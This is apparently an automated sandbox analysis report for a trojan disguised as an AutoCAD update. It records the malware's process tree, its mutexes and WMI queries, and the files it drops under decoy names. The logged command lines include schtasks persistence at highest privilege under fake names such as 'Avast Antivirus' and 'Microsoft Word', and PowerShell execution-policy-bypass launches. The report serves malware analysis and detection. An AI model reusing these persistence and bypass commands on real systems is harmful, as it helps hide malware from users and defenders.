Source: ptKNiAaGus.exe, 00000000.00000002.3328765647.0000000012CA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: ptKNiAaGus.exe, 00000000.00000000.858376455.0000000000762000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: ptKNiAaGus.exe	Binary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe

Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.cs	Security API names: File.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.cs	Security API names: File.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.cs	Security API names: File.GetAccessControl
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.cs	Security API names: File.SetAccessControl
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ptKNiAaGus.exe, TJFZgosWeymV.cs	Security API names: File.GetAccessControl
Source: ptKNiAaGus.exe, TJFZgosWeymV.cs	Security API names: File.SetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.cs	Security API names: Directory.GetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.cs	Security API names: Directory.SetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YmJpujMeeaLBNMa.cs	Security API names: File.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YmJpujMeeaLBNMa.cs	Security API names: File.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YmJpujMeeaLBNMa.cs	Security API names: File.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YmJpujMeeaLBNMa.cs	Security API names: File.SetAccessControl
Source: xdwdPutty.exe.33.dr, YmJpujMeeaLBNMa.cs	Security API names: File.GetAccessControl
Source: xdwdPutty.exe.33.dr, YmJpujMeeaLBNMa.cs	Security API names: File.SetAccessControl
Source: ptKNiAaGus.exe, YcZNhzMi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.cs	Security API names: Directory.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.cs	Security API names: Directory.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WJEyDHemWfF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdPutty.exe.33.dr, WJEyDHemWfF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rVDiXyUmB.cs	Security API names: Directory.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rVDiXyUmB.cs	Security API names: Directory.SetAccessControl
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ptKNiAaGus.exe, ngXUOZCVh.cs	Security API names: Directory.GetAccessControl
Source: ptKNiAaGus.exe, ngXUOZCVh.cs	Security API names: Directory.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rVDiXyUmB.cs	Security API names: Directory.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rVDiXyUmB.cs	Security API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.cs	Security API names: Directory.GetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.cs	Security API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.cs	Security API names: Directory.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.cs	Security API names: Directory.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.cs	Security API names: File.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.cs	Security API names: File.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: xdwdPutty.exe.33.dr, rVDiXyUmB.cs	Security API names: Directory.GetAccessControl
Source: xdwdPutty.exe.33.dr, rVDiXyUmB.cs	Security API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.cs	Security API names: File.GetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.cs	Security API names: File.SetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WJEyDHemWfF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@196/11@4/3

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File created: C:\Users\user\xdwdPutty.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:304:WilStaging_02
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Sheet_kctlwwmgcldm
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8820:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:712:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9676:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:304:WilStaging_02
Source: C:\Users\user\xdwdPutty.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:304:WilStaging_02
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Mutant created: \Sessions\1\BaseNamedObjects\Sheet_gwjvyiugty
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9580:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9132:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8620:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8324:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9184:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:304:WilStaging_02

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvdx4sk4.juy.ps1

Jump to behavior

Source: ptKNiAaGus.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ptKNiAaGus.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ptKNiAaGus.exe

ReversingLabs: Detection: 83%

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File read: C:\Users\user\Desktop\ptKNiAaGus.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ptKNiAaGus.exe "C:\Users\user\Desktop\ptKNiAaGus.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: unknown	Process created: C:\Users\user\xdwdPutty.exe C:\Users\user\xdwdPutty.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Users\user\xdwdPutty.exe C:\Users\user\xdwdPutty.exe
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
